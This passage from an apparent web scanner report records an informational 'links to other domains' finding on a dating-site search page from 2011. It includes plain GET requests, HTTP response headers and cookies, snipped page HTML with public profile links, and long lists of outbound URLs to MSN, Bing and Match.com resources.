http://sthumbnails.match.com/sthumbnails/87/67/98608767A.jpeg
http://sthumbnails.match.com/sthumbnails/89/45/98908945B.jpeg
http://success.match.com/index.aspx?lid=4
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.domania.com/
http://www.expedia.com/
http://www.getsmart.com/
http://www.hotels.com/
http://www.hotwire.com/
http://www.livenation.com/
http://www.match.com/
http://www.myhomeredacted/
http://www.ticketmaster.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /search/index.aspx?TrackingID=526133&BannerID=722765&q=man,woman,18,35&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:44:09 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/30/2011; expires=Mon, 30-Jan-2012 16:44:08 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/30/2011; domain=match.com; expires=Mon, 30-Jan-2012 16:44:08 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/30/2011&UMID=01d4ea11-8115-4024-bfb5-8c4ad5ccb98e; expires=Mon, 30-Jan-2012 16:44:08 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=acd347de-dd09-4896-9662-735b56bc36e8&THEME=74; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_HyperLink6" href="http://dating.msn.com/subscribe/subscribe.aspx?lid=1"><img id="ctl00_matchHeader_ctl00_Image5" src="http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif" style="border-width:0px;" />
                   
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_Hyperlink13" class="iGuideFin" href="/cp.aspx?cpp=/en-us/match/whitneycasey/video.html&linkid=1"><img id="ctl00_matchHeader_ctl00_Image7" src="http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif" alt="Rev Up Your love Life With These Tips!" style="border-width:0px;" /></a>
...[SNIP]...
</div>
   <img alt="Search Now" border="0" class="btnQuickSearch" src="http://images.match.com/match/search/redesign/quickSearchBtn.gif" style="height:29px;width:132px;border-width:0px;" />
   <input type="hidden" name="cl" value="1" id="cl" />
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=s0CYMNnVuKgR2yk5rA%2bJ4w%3d%3d&Handle=19hasit&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/85/60/98868560A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=7JeKdAQz9x736bGw%2fnPanA%3d%3d&Handle=Meggie9155&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/80/94/98868094B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=6E5lDfczX%2bWwL2F4W5lbDw%3d%3d&Handle=TiffMon&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/11/13/98911113A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=4mGTyMB303QXCiUxeNyvog%3d%3d&Handle=sweetleish741&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/00/73/98910073C.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=vhpRj83ikvUw9SRrBKn4CA%3d%3d&Handle=flytome005&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/42/55/98904255A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=J4BdCrBJ%2fD0AfhhzKcX1Qg%3d%3d&Handle=hrw2011&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/42/17/98904217A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
0_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=6vvAw2Zo0X%2bSWAu%2bkK1L%2bg%3d%3d&Handle=HiAltitudeMaven&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/34/36/98903436A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=aKxTPib3xjPprvXTIw92KQ%3d%3d&Handle=Ms_NonGorilla&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/14/02/98901402C.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=%2fbF4ebFEzzjBWd6iRw9SwQ%3d%3d&Handle=fastchocolate&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/37/44/98893744A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=HbC77GJzjlM9ba2gVS5P9Q%3d%3d&Handle=joyme49atyahoo&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/78/66/98887866A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=juHds8TT2%2bGBS%2f0tnmx3ag%3d%3d&Handle=roxannediane&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/25/60/98872560A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=oMPoBd%2f8Y0IMtoPg78n3kA%3d%3d&Handle=urqueenshere&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/87/67/98608767A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=%2fDY91GfkwhG6Dy%2fCZ92OVQ%3d%3d&Handle=zingara13&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/70/40/98277040A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=wINGpoLlAaOMdgveJXVXDw%3d%3d&Handle=1purplepeach&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/89/45/98908945B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=%2faPwvL7rXmxAGSIjjEQE7w%3d%3d&Handle=jenn80908&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/71/74/98907174B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=Fk%2brHkSiNTIR0j895xvVkA%3d%3d&Handle=lovinglady35&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/04/18/98900418A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=XXbGKONUU5joYXkAZZod%2bw%3d%3d&Handle=liz_army_chic&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/78/24/98887824B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=pl4MY1PHGkqoSgvn77RpvA%3d%3d&Handle=heather051984&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/41/48/98874148F.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=9xFpzIL7gccqxOTVf8CDRA%3d%3d&Handle=lilvi3tkiki&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/08/25/57690825B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=qBBQDRNqvdDsLmQ1bEQDew%3d%3d&Handle=sangeegp&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/52/09/75345209A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=XSn9qCplV82Bh3q9cdeeoQ%3d%3d&Handle=aemartine&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/30/93/72343093D.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=ZeRZL1rNw4Uz8cdHRA%2fT3A%3d%3d&Handle=RN_8247&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/71/20/98127120A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=W7OBsRWgnJvH6upS6zCgpQ%3d%3d&Handle=lizzycl&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/86/18/98728618J.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=0zh7FgH6ljct6kuhh3YIfA%3d%3d&Handle=DelightfulTiffy&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/13/13/98351313A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00$userName$ctl00$txtUserNameSearch" type="text" value="enter username here" maxlength="75" id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_txtUserNameSearch" class="userSearch watermarkOn" />
<img id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_Image1" class="goBtn" alt="Go" src="http://images.match.com/match/search/v2/goBtn.gif" style="height:26px;width:36px;border-width:0px;" />
       </div>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

22.68. http://dating.redacted/search/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/search/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dating.redacted/search/index.aspx?TrackingID=516163&BannerID=723032&q=man,woman,18,35

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://download.live.com/?sku=messenger
http://images.match.com/match/doubleblind/xCloseModal.gif
http://images.match.com/match/footer/ico_blg.gif
http://images.match.com/match/footer/ico_fb.gif
http://images.match.com/match/footer/ico_twtr.gif
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif
http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif
http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif
http://images.match.com/match/search/redesign/quickSearchBtn.gif
http://images.match.com/match/search/v2/goBtn.gif
http://match.mediaroom.com/?lid=4
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://sthumbnails.match.com/sthumbnails/02/27/98870227A.jpeg
http://sthumbnails.match.com/sthumbnails/03/35/98860335B.jpeg
http://sthumbnails.match.com/sthumbnails/12/44/98841244A.jpeg
http://sthumbnails.match.com/sthumbnails/17/88/98851788A.jpeg
http://sthumbnails.match.com/sthumbnails/19/77/98861977B.jpeg
http://sthumbnails.match.com/sthumbnails/26/49/98792649A.jpeg
http://sthumbnails.match.com/sthumbnails/36/27/98853627C.jpeg
http://sthumbnails.match.com/sthumbnails/45/38/98814538C.jpeg
http://sthumbnails.match.com/sthumbnails/52/42/98835242A.jpeg
http://sthumbnails.match.com/sthumbnails/62/34/98856234A.jpeg
http://sthumbnails.match.com/sthumbnails/64/38/67796438A.jpeg
http://sthumbnails.match.com/sthumbnails/68/17/98866817A.jpeg
http://sthumbnails.match.com/sthumbnails/69/29/98836929B.jpeg
http://sthumbnails.match.com/sthumbnails/70/20/98847020A.jpeg
http://sthumbnails.match.com/sthumbnails/73/94/98837394A.jpeg
http://sthumbnails.match.com/sthumbnails/79/50/98847950A.jpeg
http://sthumbnails.match.com/sthumbnails/81/07/98868107B.jpeg
http://sthumbnails.match.com/sthumbnails/88/99/98848899B.jpeg
http://sthumbnails.match.com/sthumbnails/92/60/56279260A.jpeg
http://sthumbnails.match.com/sthumbnails/93/93/98819393A.jpeg
http://sthumbnails.match.com/sthumbnails/95/41/98779541C.jpeg
http://sthumbnails.match.com/sthumbnails/96/71/98849671B.jpeg
http://sthumbnails.match.com/sthumbnails/99/12/98839912A.jpeg
http://sthumbnails.match.com/sthumbnails/99/34/98869934A.jpeg
http://success.match.com/index.aspx?lid=4
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.domania.com/
http://www.expedia.com/
http://www.getsmart.com/
http://www.hotels.com/
http://www.hotwire.com/
http://www.livenation.com/
http://www.match.com/
http://www.myhomeredacted/
http://www.ticketmaster.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /search/index.aspx?TrackingID=516163&BannerID=723032&q=man,woman,18,35 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:53 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:52 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:52 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=beaec16e-2a07-42e0-9fca-e2f43651bcca; expires=Sun, 29-Jan-2012 23:45:52 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=6b1a4c26-d866-498c-9543-92c55f17de5d&THEME=214; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
